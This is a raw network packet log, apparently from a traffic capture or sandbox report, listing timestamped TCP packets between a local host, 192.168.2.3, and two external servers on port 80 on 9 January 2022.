Jan 9, 2022 18:48:26.145375013 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145414114 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145423889 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145452976 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145492077 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145498991 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145530939 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145570040 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145577908 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145608902 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145648003 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145653963 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145684958 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145725965 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145733118 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145766020 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145806074 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145812988 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145847082 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145880938 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145895004 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.170165062 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.170337915 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.334887981 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.404376030 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404438019 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404478073 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404516935 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404556036 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404607058 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.404613972 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.404652119 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.404659986 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583049059 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583115101 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583153963 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583261967 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583264112 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583309889 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583327055 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583348989 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583389044 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583401918 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583429098 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583467007 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583481073 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583507061 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583544970 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583559036 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583585978 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583626032 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583635092 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583663940 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583703041 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583719015 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.583741903 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.583794117 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.663626909 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663695097 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663734913 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663777113 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663815022 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663852930 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663853884 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.663883924 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.663891077 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.663896084 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663934946 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663974047 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.663989067 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664012909 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664050102 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664066076 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664089918 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664129019 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664141893 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664167881 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664208889 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664222002 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664246082 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664287090 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664294958 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664324999 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664362907 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664376974 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664403915 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664443016 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664458036 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664483070 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664524078 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664535046 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664562941 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664596081 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664611101 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.664634943 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664669037 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.664685965 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.719141006 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.922542095 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922607899 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922646999 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922686100 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922723055 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922745943 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.922763109 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922777891 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.922811985 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922832012 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.922851086 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922889948 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922904015 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.922929049 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922966003 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.922976017 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923007011 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923044920 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923054934 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923084974 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923125029 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923132896 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923161983 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923202038 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923207998 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923240900 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923279047 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923294067 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923321009 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923358917 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923378944 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923398018 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923449039 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923502922 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923546076 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923585892 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923593998 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923624039 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923662901 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923676014 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923702002 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923741102 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923748016 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923780918 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923820019 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923829079 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923849106 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923876047 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.923899889 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.923933029 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.924005032 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:27.172147989 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:27.509716034 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:27.673377991 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:27.673679113 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:27.673799992 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:27.673846006 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:27.838541031 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.257843971 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.257905960 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.257947922 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.257978916 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.257987976 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.258357048 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.422853947 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.422916889 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.422966003 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423007011 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423012972 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.423074961 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.423793077 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423834085 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423872948 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423912048 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.423930883 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.423989058 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.586661100 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.586724043 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.586761951 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.586801052 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.586842060 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.586918116 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.586978912 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.587248087 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.587385893 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.587424994 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.587464094 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.587503910 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.587663889 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.589819908 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.589874029 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.589942932 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.590015888 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.590173960 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.590787888 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.592664003 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.592709064 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.592804909 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.750567913 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.750633955 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.750673056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.750713110 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.750828981 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.751283884 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.751327038 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.751328945 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.751364946 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.751382113 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.751405001 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.751445055 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.751494884 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.752276897 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.752316952 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.752357006 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.752368927 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.752398968 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.752403975 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.752439022 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.752496004 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.753319025 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.753361940 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.753400087 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.753420115 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.753438950 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.753479004 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.753529072 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.754287004 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.754326105 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.754364967 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.754401922 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.754405975 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.754415989 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.755357027 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.755398989 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.755436897 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.755460024 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.755475044 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.755496025 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.755515099 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.755568981 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.756252050 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.756290913 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.756330967 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.756367922 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.813010931 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.914489031 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.914561033 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.914597988 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.914630890 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.914638996 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.914696932 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.915293932 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.915338039 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.915375948 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.915389061 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.915414095 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.915455103 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.915508986 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.916321039 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.916361094 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.916388988 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.916399002 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.916439056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.916449070 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.916479111 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.916528940 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.917293072 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.917334080 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.917371035 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.917409897 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.917416096 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.917448997 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.917474985 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.918325901 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.918368101 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.918405056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.918421984 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.918443918 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.918459892 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.919292927 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.919334888 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.919353008 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.919373989 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.919414997 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.919425011 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.919456005 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.919507980 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.920294046 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.920331955 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.920371056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.920409918 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.920418978 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.920447111 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.920495033 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.921308994 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.921349049 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.921386003 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.921406031 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.921420097 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.921426058 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922291994 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922333002 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922372103 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922386885 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.922409058 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922430992 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.922449112 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.922516108 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.923289061 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.923331976 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.923368931 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.923408031 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.923422098 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.923475027 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:28.924303055 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.976645947 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:28.976790905 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.078530073 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.078598976 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.078639984 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.078680038 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.078726053 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.079288006 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.079329014 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.079334974 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.079368114 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.079406977 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.079432964 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.079447031 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.079473972 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.080440044 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.080478907 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.080502033 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.080518961 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.080557108 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.080565929 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.080596924 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.080650091 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.081295967 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.081336021 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.081372023 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.081398964 CET	49845	80	192.168.2.3	148.0.74.229
